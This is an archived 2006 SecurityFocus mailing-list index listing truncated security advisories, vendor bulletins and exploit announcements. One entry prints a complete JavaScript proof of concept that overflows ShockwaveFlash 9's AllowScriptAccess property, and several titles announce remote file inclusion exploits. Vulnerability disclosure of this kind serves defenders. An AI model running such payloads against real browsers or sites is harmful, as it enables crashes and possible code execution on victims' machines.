SecurityFocus

Re: Re: CGI Script Source Code Disclosure Vulnerability in Apache for Windows 2006-08-17
nareshhacker gmail com

This _is_ a vulnerability.

Even though the common convention is never to include 'cgi-bin' within the document-root, still, many companies put 'cgi-bin' inside the document-root assuming it to be a safe practice.

No matter what the common convention is; the fact is, if the cgi-bin directory i

[ more ] [ reply ]

CubeCart <= 3.0.11 SQL injection & cross site scripting 2006-08-17
rgod autistici org

------------------------------------------------------------------------
--------

CubeCart <= 3.0.11 SQL injection & cross site scripting

software:

site: http://www.cubecart.com/site/home/

description: "CubeCart is an eCommerce script written with PHP & MySQL. With

CubeCart you can setup a power

[ more ] [ reply ]

Registration Now Open!: Security OPUS Infosec Conference - Oct 2-5 2006 - San Francisco, CA 2006-08-17
Richard Lindberg (Richard IdealRealms com)

Registration for the Security OPUS Infosec conference in San Francisco is
now open.

http://www.SecurityOPUS.com

We have a new venue this year; The W hotel!
http://www.starwoodhotels.com/whotels/index.html Discounted rooms are
available, but limited. Ask for the Security OPUS rate when booking.

R

[ more ] [ reply ]

[USN-336-1] binutils vulnerability 2006-08-17
Martin Pitt (martin pitt canonical com)

===========================================================
Ubuntu Security Notice USN-336-1 August 16, 2006
binutils vulnerability
http://bugs.gentoo.org/show_bug.cgi?id=99464
===========================================================

A security issue affects the following Ubuntu rele

[ more ] [ reply ]

[EEYEB-20060703] IBM eGatherer ActiveX Code Execution Vulnerability 2006-08-16
eEye Advisories (Advisories eeye com)

IBM eGatherer ActiveX Code Execution Vulnerability

Release Date:
August 16, 2006

Date Reported:
July 3, 2006

Patch Development Time (in days):
44

Severity:
High (Remote Code Execution)

Vendor:
IBM / Lenovo

Systems Affected:
Windows NT 4.0 (All versions)
Windows 2000 (All versions)
Windows XP (

[ more ] [ reply ]

[USN-337-1] imagemagick vulnerability 2006-08-17
Martin Pitt (martin pitt canonical com)

===========================================================
Ubuntu Security Notice USN-337-1 August 16, 2006
imagemagick vulnerability
CVE-2006-4144
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.

[ more ] [ reply ]

powergap <= (s0x.php) Remote File Inclusion 2006-08-17
saudi unix hotmail com

#=================================================================

#powergap <= (s0x.php) Remote File Inclusion Exploit

#================================================================

# |

#Critical Level : Dangerous

[ more ] [ reply ]

discloser 0.0.4 Remote File Inclusion (with Exploit) 2006-08-16
dr t3rr0r1st yahoo com

#!/usr/bin/perl

########################################################################
###################

# Aria-Security.net Advisory #

# Discovered by: Dr.t3rr0r1st #

[ more ] [ reply ]

[security bulletin] HPSBUX02139 SSRT5981 rev.1 - HP-UX Running the LP Subsystem, remote Denial of Service (DoS) 2006-08-17
security-alert hp com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00746980
Version: 1

HPSBUX02139 SSRT5981 rev.1 - HP-UX Running the LP Subsystem, remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as

[ more ] [ reply ]

[ MDKSA-2006:143 ] - Updated Firefox packages fix multiple vulnerabilities 2006-08-16
security mandriva com

SYM06-16 Symantec NetBackup PureDisk Remote Office Edition Elevation of Privilege 2006-08-16
Mike Prosser (mprosser symantec com)

Technical note by Amit Klein: "Sending arbitrary HTTP requests with Flash 7/8 (+IE 6.0)" 2006-08-16
Amit Klein (AKsecurity) (aksecurity hotpop com)

Sending arbitrary HTTP requests with Flash 7/8 (+IE 6.0)

Amit Klein, August 2006

The trick
=========

In [1], I showed how to forge parts of HTTP requests containing
CRs and LFs using Flash. In that write-up, the data was part of the
HTTP body section. However, combining the Content

[ more ] [ reply ]

[security bulletin] HPSBUX02115 SSRT061077 rev.2 - HP-UX running Support Tools Manager (xstm, cstm, stm) Local Denial of Service (DoS) 2006-08-16
security-alert hp com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00657001
Version: 2

HPSBUX02115 SSRT061077 rev.2 - HP-UX running Support Tools Manager (xstm, cstm, stm)
Local Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should b

[ more ] [ reply ]

ShockwaveFlash 9 (Stack overflow) 2006-08-16
Mr Niega gmail com

<script>

var a = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.9');

var c = 'ftp://';

var b = 'A';

while (b.length <= 51512*512) b+=b;

a.AllowScriptAccess = c+b;

</script>

[ more ] [ reply ]

Reporter Mambo Component Remote File İnclude 2006-08-16
crackers_child sibersavascilar com

!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!

------------------------------------------------------------------------
--------

Title : Reporter Mambo Component Remote File Include Vulnerabilities

------------------------------------------------------------------------
--------

#Author: Crackers

[ more ] [ reply ]

MS Terminal Server application session breakout 2006-08-16
pedantic1 gmail com (1 replies)

Author: Bill Littlejohn

http://wklpc.blogspot.com/2006/08/easy-ms-terminal-server-desktop-hack.h
tml

There is a vulnerability in Microsoft Terminal Server when an application is specified for the user instead of a full Windows Desktop. It is possible to easily cause an error in explorer.exe and t

[ more ] [ reply ]

Re: MS Terminal Server application session breakout 2006-08-16
Thor (Hammer of God) (thor hammerofgod com)

[scip_Advisory 2457] Horde Framework and Horde IMP /horde/imp/search.php cross site scripting 2006-08-16
Marc Ruef (maru scip ch)

Horde Framework and Horde IMP search.php cross site scripting

scip AG Vulnerability ID 2457 (08/16/2006)
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2457

I. INTRODUCTION

Horde is an open-source web application framework based on PHP. It
offers popular applications, such as the Horde IMP mail c

[ more ] [ reply ]

[scip_Advisory 2456] Horde Framework and Horde IMP /index.php cross site referencing 2006-08-16
Marc Ruef (maru scip ch)

Horde Framework and Horde IMP /index.php cross site referencing

scip AG Vulnerability ID 2456 (08/16/2006)
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2456

I. INTRODUCTION

Horde is an open-source web application framework based on PHP. It
offers popular applications, such as the Horde IMP mail

[ more ] [ reply ]

[USN-335-1] heartbeat vulnerability 2006-08-16
Martin Pitt (martin pitt canonical com)

===========================================================
Ubuntu Security Notice USN-335-1 August 16, 2006
heartbeat vulnerability
CVE-2006-3121
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10

[ more ] [ reply ]

Mambo com_lm component (archive.php) Remote File Include Vulnerabilities 2006-08-16
crackers_child sibersavascilar com

!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!

------------------------------------------------------------------------
--------

Title : Mambo com_lm component (archive.php) Remote File Include Vulnerabilities

------------------------------------------------------------------------
--------

#Author

[ more ] [ reply ]

Re: TinyWebGallery v1.5 ( image ) Remote Include Vulnerability 2006-08-16
tinywebgallery mdempfle de

Simply delete the examples folder - It's only there as examples. TWF 1.5.0.1 does protect this folder too!

[ more ] [ reply ]

[XSec-06-05]: VMware 5.5.1 for Windows arbitrary partition table delete issue. 2006-08-16
root (root xsec org)

Advisory ID:
XSec-06-05

Advisory Name:
VMware 5.5.1 for Windows arbitrary partition table delete issue.

Release Date:
08/16/2006

Tested on:
VMware 5.5.1 build-19175 on Windows Server 2000/2003

Affected version:
VMware 5.5.1

Author:
nop <nop#xsec.org>
http://www.xsec.org

Overview:
On running wi

[ more ] [ reply ]

[USN-334-1] krb5 vulnerabilities 2006-08-16
Martin Pitt (martin pitt canonical com)

===========================================================
Ubuntu Security Notice USN-334-1 August 16, 2006
krb5 vulnerabilities
CVE-2006-3083, CVE-2006-3084
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04

[ more ] [ reply ]

Lizge V.20 Web Portal File Include Vulnerability 2006-08-15
crackers_child sibersavascilar com

!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!

------------------------------------------------------------------------
--------

Title : Lizge V.20 Web Portal File Include Vulnerability

------------------------------------------------------------------------
--------

#Author: Crackers_Child

#c

[ more ] [ reply ]

fusionnews 3,7 Remote File Inclusion 2006-08-15
Outlaw aria-security net

#!/usr/bin/perl

########################################################################
###################

# Aria-Security.net Advisory #

# Discovered by: OUTLAW #

#

[ more ] [ reply ]

[security bulletin] HPSBUX02141 SSRT51153 rev.1 - HP-UX in Trusted mode, Local Denial of Service (DoS) 2006-08-15
security-alert hp com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00749123

Version: 1

HPSBUX02141 SSRT51153 rev.1 - HP-UX in Trusted mode, Local Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible

[ more ] [ reply ]